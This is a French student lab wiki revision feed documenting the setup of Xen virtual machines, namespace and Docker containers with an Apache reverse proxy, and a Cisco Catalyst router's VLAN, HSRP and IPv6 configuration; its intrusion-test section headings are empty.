                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w',                  # Partition LVM pour /var&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_home,xvdb1,w',                 # Partition LVM pour /home&lt;br /&gt;
 &lt;br /&gt;
      ]&lt;br /&gt;
 [...]&lt;br /&gt;
 #&lt;br /&gt;
 #  Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.178 ,mac=00:16:3E:6F:61:EE,bridge=IMA5sc' ]       # Ajout du bridge&lt;br /&gt;
 [...]&lt;br /&gt;
&lt;br /&gt;
===== Lancement de la machine =====&lt;br /&gt;
&lt;br /&gt;
Toujours en root depuis cordouan&lt;br /&gt;
&lt;br /&gt;
* Lancement : &amp;lt;code&amp;gt;xl create /etc/xen/Dionysos.cfg&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
À l'issue du premier lancement, on récupère un mot de passe root automatiquement généré&lt;br /&gt;
&lt;br /&gt;
* Une fois lancée : &amp;lt;code&amp;gt;xl console Dionysos&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On arrive donc sur la machine, il y a plusieurs modifications à effectuer :&lt;br /&gt;
&lt;br /&gt;
====== Autoriser le login en root sur la machine via SSH ======&lt;br /&gt;
&lt;br /&gt;
Modification du fichier &amp;lt;code&amp;gt;/etc/ssh/sshd_config&amp;lt;/code&amp;gt; nous décommentons la ligne &amp;lt;code&amp;gt;PermitRootLogin yes&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Modifier le mot de passe root : &amp;lt;code&amp;gt;passwd&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====== Réglage du réseau ======&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/network/interfaces&amp;lt;/code&amp;gt; pour ajouter &amp;lt;code&amp;gt;gateway 193.48.57.190&amp;lt;/code&amp;gt; à l'interface eth0&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
  gateway 193.48.57.190&lt;br /&gt;
 [...]&lt;br /&gt;
&lt;br /&gt;
On éteint puis allume à nouveau l'interface avec &amp;lt;code&amp;gt;ifdown eth0&amp;lt;/code&amp;gt; et &amp;lt;code&amp;gt;ifup eth0&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Ajout de la route par défaut pour utiliser le routeur virtuel de l'architecture&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;ip route add default via 193.48.57.190 dev eth0 onlink&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
l'IP '''193.48.57.190''' est celle du routeur virtuel. Elle a été définie lors du plan d'adressage&lt;br /&gt;
&lt;br /&gt;
=== Architecture réseau ===&lt;br /&gt;
&lt;br /&gt;
==== L'architecture générale ====&lt;br /&gt;
&lt;br /&gt;
==== Les réseaux virtuels ====&lt;br /&gt;
&lt;br /&gt;
==== Le routage de sites (IPv4) ====&lt;br /&gt;
&lt;br /&gt;
==== Le routage de site (IPv6) ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation du réseau ====&lt;br /&gt;
&lt;br /&gt;
=== Services Internet ===&lt;br /&gt;
&lt;br /&gt;
==== Serveur SSH ====&lt;br /&gt;
&lt;br /&gt;
==== Serveur DNS ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de site web par certificat ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de serveur DNS par DNSSEC ====&lt;br /&gt;
&lt;br /&gt;
=== Tests d'intrusion ===&lt;br /&gt;
&lt;br /&gt;
==== Intrusion par changement d'adresse MAC ====&lt;br /&gt;
&lt;br /&gt;
==== Cassage de clef WEP d'un point d'accès wifi ====&lt;br /&gt;
&lt;br /&gt;
==== Cassage de mot de passe WPA-PSK par force brute ====&lt;br /&gt;
&lt;br /&gt;
=== Réalisation ===&lt;br /&gt;
&lt;br /&gt;
* '''REMARQUE''' Nous n'avons pas eu à nous occuper des points '''6.3''', '''6.4''' et '''6.5''' du sujet&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de données ====&lt;br /&gt;
&lt;br /&gt;
==== Cryptage de données ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation Wifi par WPA2-EAP ====&lt;/div&gt;</summary>
		<author><name>Jdupont3</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=49068</id>
		<title>TP sysres IMA5sc 2018/2019 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=49068"/>
				<updated>2018-12-21T10:52:10Z</updated>
		
		<summary type="html">&lt;p&gt;Jdupont3 : /* Installation des systèmes d'exploitation */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=TP GIS4 - Conteneur réalisation manuelle=&lt;br /&gt;
==Création des systèmes fichier==&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /home/pifou/Documents/IMA5/JDQB/PRA/   (Zabeth09)&lt;br /&gt;
&lt;br /&gt;
  dd if=/dev/zero of=disk1 bs=1024k count=10240&lt;br /&gt;
&lt;br /&gt;
  mkfs disk1&lt;br /&gt;
&lt;br /&gt;
Dans /tmp création de répertoires pour le stockage &lt;br /&gt;
  &lt;br /&gt;
  mkdir JDQB_DISK1&lt;br /&gt;
  mkdir JDQB_DISK2&lt;br /&gt;
  mkdir JDQB_DISK3&lt;br /&gt;
&lt;br /&gt;
  mount -o loop disk1 /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  debootstrap --include=apache2,nano stable /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  echo &amp;quot;proc /proc defaults 0 0&amp;quot; &amp;gt;&amp;gt; /tmp/JDQB_DISK1/etc/fstab&lt;br /&gt;
&lt;br /&gt;
  umount -d /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
On clone le disk1 pour avoir disk2 et disk3 (cp)&lt;br /&gt;
&lt;br /&gt;
On remonte les trois disques&lt;br /&gt;
  mount -o loop diskX /tmp/JDQB_DISKX&lt;br /&gt;
&lt;br /&gt;
==Lancement des conteneurs==&lt;br /&gt;
Ouverture de trois terminaux en root, puis utilisation de la commande dans chacun des terminaux&lt;br /&gt;
&lt;br /&gt;
  unshare -n -u -p -f -m chroot /tmp/JDQB_DISKX /bin/sh -c &amp;quot;mount /proc ; /bin/bash&amp;quot; ;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
&lt;br /&gt;
  ip l set eth0 up&lt;br /&gt;
Cette commande s'applique aussi à eth1 pour le conteneur 1&lt;br /&gt;
&lt;br /&gt;
==Mise en place commutateur virtuel==&lt;br /&gt;
Création des interfaces liées&lt;br /&gt;
&lt;br /&gt;
iface_virt_X (interface virtuelle X) &amp;lt;-&amp;gt; iface_ns_X (interface namespace X)&lt;br /&gt;
&lt;br /&gt;
  ip link add iface_virt_1 type veth peer name iface_ns_1&lt;br /&gt;
  ip link add iface_virt_2 type veth peer name iface_ns_2&lt;br /&gt;
  ip link add iface_virt_3 type veth peer name iface_ns_3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création de notre propre pont&lt;br /&gt;
&lt;br /&gt;
  ip link add jdqb_bridge type bridge&lt;br /&gt;
&lt;br /&gt;
Ajout des parties des interfaces dans le commutateur&lt;br /&gt;
&lt;br /&gt;
  ip link set iface_virt_1 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_2 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_3 master jdqb_bridge&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Activation des interfaces&lt;br /&gt;
  ip link set iface_virt_1 up&lt;br /&gt;
  ip link set iface_virt_2 up &lt;br /&gt;
  ip link set iface_virt_3 up  &lt;br /&gt;
&lt;br /&gt;
Activation du pont&lt;br /&gt;
  ip address add dev jdqb_bridge 192.168.0.1/24&lt;br /&gt;
&lt;br /&gt;
Montée du pont&lt;br /&gt;
  ip link set jdqb_bridge up&lt;br /&gt;
&lt;br /&gt;
Connexion des conteneurs à leur interface virtuelle respective&lt;br /&gt;
  ip link set iface_ns_1 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_2 netns /proc/&amp;lt;PID2&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_3 netns /proc/&amp;lt;PID3&amp;gt;/ns/net name eth0&lt;br /&gt;
&lt;br /&gt;
Obtention des PIDs&lt;br /&gt;
  ps aux | grep unshare&lt;br /&gt;
&lt;br /&gt;
Quatrième interface, reliant le mandataire web inverse (conteneur 1) et le bridge de zabeth09&lt;br /&gt;
  ip link add iface_virt_0 type veth peer name iface_ns_0&lt;br /&gt;
  ip link set iface_virt_0 master bridge&lt;br /&gt;
  ip link set iface_virt_0 up&lt;br /&gt;
  ip link set iface_ns_0 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth1&lt;br /&gt;
&lt;br /&gt;
==Modification de la table IP==&lt;br /&gt;
&lt;br /&gt;
  iptables -F&lt;br /&gt;
  iptables -F -t nat&lt;br /&gt;
  iptables -P FORWARD ACCEPT&lt;br /&gt;
&lt;br /&gt;
Attribution des adresses aux conteneurs&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth0 192.168.0.91/24&lt;br /&gt;
  nsenter -t &amp;lt;PID2&amp;gt; -n ip address add dev eth0 192.168.0.92/24&lt;br /&gt;
  nsenter -t &amp;lt;PID3&amp;gt; -n ip address add dev eth0 192.168.0.93/24&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth1 172.26.145.90/24&lt;br /&gt;
&lt;br /&gt;
==Mandataire inverse==&lt;br /&gt;
===Configuration Apache2===&lt;br /&gt;
&lt;br /&gt;
Afin de configurer notre premier conteneur en mandataire inverse, nous modifions le fichier : /etc/apache2/sites-available/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons : &lt;br /&gt;
  &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
  ...  &lt;br /&gt;
  ProxyPass /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPassReverse /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPass /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyPassReverse /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
  ...&lt;br /&gt;
  &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Configuration réseau===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ajout de la route par défaut (Polytech) : &lt;br /&gt;
  ip route add default via 172.26.145.254&lt;br /&gt;
&lt;br /&gt;
Configuration eth1 : &lt;br /&gt;
  ip add add dev eth1 172.26.145.90/24&lt;br /&gt;
  ip link set eth1 up&lt;br /&gt;
&lt;br /&gt;
11h25 =&amp;gt; Serveurs Web unshare OK&lt;br /&gt;
 &lt;br /&gt;
=Création des conteneurs via Docker=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Instructions''Texte italique''==&lt;br /&gt;
docker run -i -t debian&lt;br /&gt;
&lt;br /&gt;
export http&lt;br /&gt;
&lt;br /&gt;
apt-get install apache nano vi&lt;br /&gt;
&lt;br /&gt;
En dehors conteneur docker commit &amp;lt;image name&amp;gt; sur le conteneur&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Creer réseau privé docker network create&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
(2X)docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau&lt;br /&gt;
docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau -p 80:80&lt;br /&gt;
&lt;br /&gt;
DNS : vérifier les @IP des conteneurs&lt;br /&gt;
LE mandataire inverse doit avoir @IP de zabeth&lt;br /&gt;
&lt;br /&gt;
==Procédure==&lt;br /&gt;
Modification des paramètres de docker dans /etc/default/docker, commenter la ligne DOCKER_EPTS=&amp;quot;--iptables=false&amp;quot;&lt;br /&gt;
&lt;br /&gt;
  iptables-save&lt;br /&gt;
  service docker restart&lt;br /&gt;
&lt;br /&gt;
  docker run -i -t debian /bin/bash&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur&lt;br /&gt;
  export http_proxy&lt;br /&gt;
  export https_proxy&lt;br /&gt;
&lt;br /&gt;
  apt-get update&lt;br /&gt;
  apt-get install apache2 nano vim&lt;br /&gt;
&lt;br /&gt;
Récupération ID du docker&lt;br /&gt;
  docker ps&lt;br /&gt;
&lt;br /&gt;
Commit sur le docker&lt;br /&gt;
  docker commit &amp;lt;ID&amp;gt; apache2&lt;br /&gt;
&lt;br /&gt;
Création du network&lt;br /&gt;
  docker network create jdqb_network&lt;br /&gt;
&lt;br /&gt;
Lancement des conteneurs&lt;br /&gt;
  docker run -i -t --net jdqb_network apache2 &lt;br /&gt;
  docker run -i -t --net jdqb_network apache2&lt;br /&gt;
  docker run -i -t --net jdqb_network -p 80:80 apache2&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
  ip a&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur mandataire&lt;br /&gt;
  nano /etc/apache2/sites-enabled/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Ajout des proxypass&lt;br /&gt;
&lt;br /&gt;
  ProxyPass /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPass /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
&lt;br /&gt;
Ajout d'un DNS dans GANDI @plil.space&lt;br /&gt;
&lt;br /&gt;
Type A , TTL 1800, nom jdqb-docker, &amp;lt;ip bridge zabeth&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sur les trois conteneurs&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
10h20 Serveurs Web (docker) OK&lt;br /&gt;
&lt;br /&gt;
=TP PRA - Mise en place du routeur Catalyst 3650=&lt;br /&gt;
&lt;br /&gt;
* Sujet : [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html Lien - rex.plil.fr]&lt;br /&gt;
&lt;br /&gt;
== Déroulement des Séances ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Séance 1 : 26/11/2018===&lt;br /&gt;
&lt;br /&gt;
Nous avons à notre disposition l'adresse IPV4 routée 193.48.57.160/27.&lt;br /&gt;
&lt;br /&gt;
Nous disposons également de l'adresse IPV4 non routée 10.60.0.0/16.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Découpage réseau IPV4 routé en deux sous réseaux====&lt;br /&gt;
&lt;br /&gt;
Nous divisons l'IPV4 routée en deux sous réseaux.&lt;br /&gt;
&lt;br /&gt;
Pour réaliser leur TP, les IMA2A5 ont utilisés les adresses comprises entre 193.48.57.160/28 et 193.48.57.175/28.&lt;br /&gt;
&lt;br /&gt;
Nous utiliserons donc le second sous réseau : 193.48.57.176/28 à 193.48.57.191/28.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Par conséquent l'adresse IP du routeur 1 est 193.48.57.188/28&lt;br /&gt;
&lt;br /&gt;
Celle du routeur 2 est 193.48.57.189/28&lt;br /&gt;
&lt;br /&gt;
Et enfin le routeur virtuel, pour la diffusion entre routeurs, est 193.48.57.190/28&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Découpage du réseau IPV4 non routée en sous réseaux====&lt;br /&gt;
&lt;br /&gt;
Nous découpons notre réseau en 254 sous réseaux disponibles. Les IMA2A5 ont utilisés les 5 premiers 10.60.1.0/24 à 10.60.5.0/24 .&lt;br /&gt;
&lt;br /&gt;
Nous prendrons donc les adresses entre 10.60.11.0/24 et 10.60.21.0/24 .&lt;br /&gt;
&lt;br /&gt;
Ces adresses seront routées vers les adresses comprises entre 193.48.57.177/28 et 193.48.57.187/28 .&lt;br /&gt;
&lt;br /&gt;
===Séance 2 : 27/11/2018===&lt;br /&gt;
&lt;br /&gt;
Configuration du routeur Catalyst 3560&lt;br /&gt;
&lt;br /&gt;
====Mise en place du routeur et connexion à celui ci====&lt;br /&gt;
La configuration du routeur se fera via minicom.&lt;br /&gt;
&lt;br /&gt;
Vérification de l'interface à utiliser :&lt;br /&gt;
&lt;br /&gt;
  ls /dev/ | grep ttyUSB&lt;br /&gt;
&lt;br /&gt;
Notre routeur est connecté sur ttyUSB0.&lt;br /&gt;
&lt;br /&gt;
  minicom -os&lt;br /&gt;
&lt;br /&gt;
Les paramètres de configuration de minicom sont les suivants : &lt;br /&gt;
&lt;br /&gt;
- port /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
- baud 9600&lt;br /&gt;
&lt;br /&gt;
- 8 bits&lt;br /&gt;
&lt;br /&gt;
- pas de bit de parité&lt;br /&gt;
&lt;br /&gt;
- 1 bit de stop&lt;br /&gt;
&lt;br /&gt;
- pas de contrôle de flux&lt;br /&gt;
&lt;br /&gt;
====Configuration du routeur : Configuration des ports====&lt;br /&gt;
Passage en administrateur :&lt;br /&gt;
&lt;br /&gt;
  Router&amp;gt;enable&lt;br /&gt;
  Router#&lt;br /&gt;
&lt;br /&gt;
On liste les interfaces&lt;br /&gt;
&lt;br /&gt;
  Router#show interface status&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  Port      Name               Status       Vlan       Duplex    Speed   Type&lt;br /&gt;
  Gi0/1                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/2                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/3                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/4                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/5                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/6                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/7                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/8                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/9                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/10                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  &lt;br /&gt;
  Gi0/11                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 2 (en E306)&lt;br /&gt;
  &lt;br /&gt;
  // Non connecté&lt;br /&gt;
  [...interfaces Gi0/12-Gi0/48]&lt;br /&gt;
  &lt;br /&gt;
  // les fibres&lt;br /&gt;
  Te0/1                        notconnect   1          full      10G     10GBase-SR             // vers le local SR52&lt;br /&gt;
  Te0/2                        notconnect   1          full      10G     10GBase-SR             // vers cordouan&lt;br /&gt;
&lt;br /&gt;
Afin d'accélérer la communication entre le routeur et le commutateur, les ports 1 à 10 du routeur seront connectés au commutateur. &lt;br /&gt;
&lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface range Gi0/1 - 11&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access trunk                                       &lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers le local SR52&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/1&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers Cordouan&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/2&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
PROBLEME : &lt;br /&gt;
&lt;br /&gt;
  *Mar  1 01:42:30.518: %CDP-4-NATIVE_VLAN_MISMATCH: Native VLAN mismatch discovered on TenGigabitEthernet0/2 (43), with Switch GigabitEthernet3/2 (42).&lt;br /&gt;
&lt;br /&gt;
A FAIRE : &lt;br /&gt;
&lt;br /&gt;
*configurer les interfaces / BDI&lt;br /&gt;
&lt;br /&gt;
====Mise en place de la machine virtuelle====&lt;br /&gt;
Notre machine virtuelle a les paramètres suivants : &lt;br /&gt;
&lt;br /&gt;
-Hostname = Dionysos&lt;br /&gt;
&lt;br /&gt;
-@IP = 193.48.57.178&lt;br /&gt;
&lt;br /&gt;
-Netmask = 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
-dossier = /usr/local/xen&lt;br /&gt;
  &lt;br /&gt;
  xen-create-image --hostname=Dionysos --ip=193.48.57.178 --netmask=255.255.255.240 --dir=/usr/local/xen&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/xen, nous modifions le fichier Dionysos.cfg. &lt;br /&gt;
&lt;br /&gt;
Nous adaptons le bridge StudentsInfo, qui devient IMA5sc.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Connexion à la VM, avec le login root, mot de passe fourni a la fin de l'installation &lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/ssh/sshd_config nous décommentons la ligne : &lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
Ainsi nous pouvons nous connecter en ssh sur notre VM&lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous lançons une instance de la VM&lt;br /&gt;
&lt;br /&gt;
  xl create Dionysos.cfg&lt;br /&gt;
  xl console Dionysos&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour que le système soit connecté dans /etc/network/interfaces nous ajoutons la gateway.&lt;br /&gt;
  gateway 193.48.57.190&lt;br /&gt;
&lt;br /&gt;
Dans /root/.profile&lt;br /&gt;
  &lt;br /&gt;
  http_proxy=&amp;quot;http://proxy.polytech-lille.fr:3128&amp;quot;&lt;br /&gt;
  https_proxy=&amp;quot;https://proxy.polytech-lille.fr:3128&amp;quot;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
  ip route add default via 193.48.57.190 dev eth0 onlink&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous avons modifié le mot de passe initial.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour éteindre une VM&lt;br /&gt;
  &lt;br /&gt;
  xl shutdown Dionysos&lt;br /&gt;
&lt;br /&gt;
===Séance 3 : 10/12/2018===&lt;br /&gt;
&lt;br /&gt;
====Config Routeur 3560====&lt;br /&gt;
&lt;br /&gt;
*Commande pour save la configuration&lt;br /&gt;
&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
Correction sur la config du routeur&lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 4006 - 10 cables 1G (Notre Salle)&lt;br /&gt;
 &lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface range Gi0/1 - 10&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 6000 - 1 cable 1G (Autre Salle)&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface gi0/11&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
*Vers Cordouan - cable 10G (Fibre)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/2&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Vers le local SR52&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/1&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan M = 10 + N (Groupe N)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlanM&lt;br /&gt;
 ip address 10.60.M.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby M ip 10.60.M.254&lt;br /&gt;
 standby M preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60CN eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CN::/64 1000 9000&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 43 (IM5sc)&lt;br /&gt;
&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 131 (Interconnexion)&lt;br /&gt;
 &lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Nommer un VLANs&lt;br /&gt;
&lt;br /&gt;
 vlan M&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 43&lt;br /&gt;
 name Xen&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 131&lt;br /&gt;
 name interconnexion&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 ip routing&lt;br /&gt;
 exit                &lt;br /&gt;
 show ip route      &lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is not set&lt;br /&gt;
 &lt;br /&gt;
      193.48.57.0/28 is subnetted, 1 subnets&lt;br /&gt;
 C       193.48.57.176 is directly connected, Vlan43&lt;br /&gt;
      10.0.0.0/24 is subnetted, 11 subnets&lt;br /&gt;
 C       10.60.20.0 is directly connected, Vlan20&lt;br /&gt;
 C       10.60.21.0 is directly connected, Vlan21&lt;br /&gt;
 C       10.60.18.0 is directly connected, Vlan18&lt;br /&gt;
 C       10.60.19.0 is directly connected, Vlan19&lt;br /&gt;
 C       10.60.16.0 is directly connected, Vlan16&lt;br /&gt;
 C       10.60.17.0 is directly connected, Vlan17&lt;br /&gt;
 C       10.60.14.0 is directly connected, Vlan14&lt;br /&gt;
 C       10.60.15.0 is directly connected, Vlan15&lt;br /&gt;
 C       10.60.12.0 is directly connected, Vlan12&lt;br /&gt;
 C       10.60.13.0 is directly connected, Vlan13&lt;br /&gt;
